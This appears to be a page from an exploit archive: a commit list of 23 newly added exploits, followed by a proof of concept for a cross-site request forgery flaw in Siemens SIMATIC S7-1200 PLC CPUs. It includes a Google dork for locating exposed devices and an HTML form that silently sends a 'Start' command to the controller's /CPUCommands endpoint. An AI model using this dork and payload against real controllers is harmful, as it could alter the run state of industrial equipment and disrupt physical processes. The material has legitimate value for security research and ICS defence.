08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
15 lines
No EOL
516 B
Text
15 lines
No EOL
516 B
Text
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
|
|
# Google Dork: inurl:/Portal/Portal.mwsl
|
|
# Date: 2018-05-21
|
|
# Exploit Author: t4rkd3vilz, Jameel Nabbo
|
|
# Vendor Homepage: https://www.siemens.com/
|
|
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
|
|
# Tested on: Kali Linux
|
|
# CVE: CVE-2015- 5698
|
|
|
|
# 1. Proof of Concept
|
|
|
|
<form method="POST" action="http://targetIp/CPUCommands">
|
|
<input name="PriNav" value="Start">
|
|
<input type="submit" value="Go!">
|
|
</form> |